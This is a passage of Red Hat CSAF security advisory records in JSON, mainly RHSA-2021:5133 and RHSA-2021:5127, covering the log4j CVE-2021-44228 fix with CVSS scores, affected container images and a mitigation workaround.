"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", 
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", 
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-05-01T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" } ] }
rhsa-2021_5133
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat AMQ Streams 1.6.5 is now available from the Red Hat Customer Portal.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. \n\nThis release of Red Hat AMQ Streams 1.6.5 serves as a replacement for Red Hat AMQ Streams 1.6.4, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5133", "url": "https://access.redhat.com/errata/RHSA-2021:5133" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.streams\u0026version=1.6.5", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.streams\u0026version=1.6.5" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5133.json" } ], "title": "Red Hat Security Advisory: Red Hat AMQ Streams 1.6.5 release and security update", "tracking": { "current_release_date": "2024-12-12T01:18:45+00:00", "generator": { "date": "2024-12-12T01:18:45+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5133", "initial_release_date": "2021-12-14T21:13:26+00:00", "revision_history": [ { "date": "2021-12-14T21:13:26+00:00", "number": "1", "summary": "Initial version" }, { "date": 
"2021-12-14T21:13:26+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:18:45+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat AMQ Streams 1.6.5", "product": { "name": "Red Hat AMQ Streams 1.6.5", "product_id": "Red Hat AMQ Streams 1.6.5", "product_identification_helper": { "cpe": "cpe:/a:redhat:amq_streams:1" } } } ], "category": "product_family", "name": "Red Hat JBoss AMQ" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. 
Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat AMQ Streams 1.6.5" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": 
"https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:13:26+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "Red Hat AMQ Streams 1.6.5" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5133" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from 
the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "Red Hat AMQ Streams 1.6.5" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat AMQ Streams 1.6.5" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" } ] }
rhsa-2021_5127
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update is now available for OpenShift Logging 5.2.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Openshift Logging Security and Bug Fix Release (5.2.4)\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* netty: Request smuggling via content-length header (CVE-2021-21409)\n\n* netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data (CVE-2021-37136)\n\n* netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5127", "url": "https://access.redhat.com/errata/RHSA-2021:5127" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "1944888", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888" }, { "category": "external", "summary": "2004133", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133" }, { "category": "external", "summary": "2004135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "LOG-1775", "url": "https://issues.redhat.com/browse/LOG-1775" }, { "category": "external", "summary": "LOG-1824", "url": "https://issues.redhat.com/browse/LOG-1824" }, { "category": "external", "summary": "LOG-1963", "url": "https://issues.redhat.com/browse/LOG-1963" }, { "category": "external", "summary": "LOG-1970", "url": "https://issues.redhat.com/browse/LOG-1970" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5127.json" } ], "title": "Red Hat Security Advisory: Openshift Logging security and bug 
update (5.2.4)", "tracking": { "current_release_date": "2024-12-12T01:17:39+00:00", "generator": { "date": "2024-12-12T01:17:39+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5127", "initial_release_date": "2021-12-14T18:38:45+00:00", "revision_history": [ { "date": "2021-12-14T18:38:45+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T18:38:45+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:17:39+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "OpenShift Logging 5.2", "product": { "name": "OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2", "product_identification_helper": { "cpe": "cpe:/a:redhat:logging:5.2::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift Enterprise" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "product": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "product_id": "openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "product_identification_helper": { "purl": "pkg:oci/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/cluster-logging-rhel8-operator\u0026tag=v5.2.4-4" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "product": { "name": 
"openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.2.4-4" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-67" } } }, { "category": "product_version", "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "product": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "product_identification_helper": { "purl": 
"pkg:oci/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-44" } } }, { "category": "product_version", "name": "openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "product": { "name": "openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "product_id": "openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "product_identification_helper": { "purl": "pkg:oci/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-47" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", "product_id": "openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-66" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "product_id": 
"openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-64" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "product_id": "openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-71" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "product": { "name": "openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "product_id": "openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-74" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "product": { "name": 
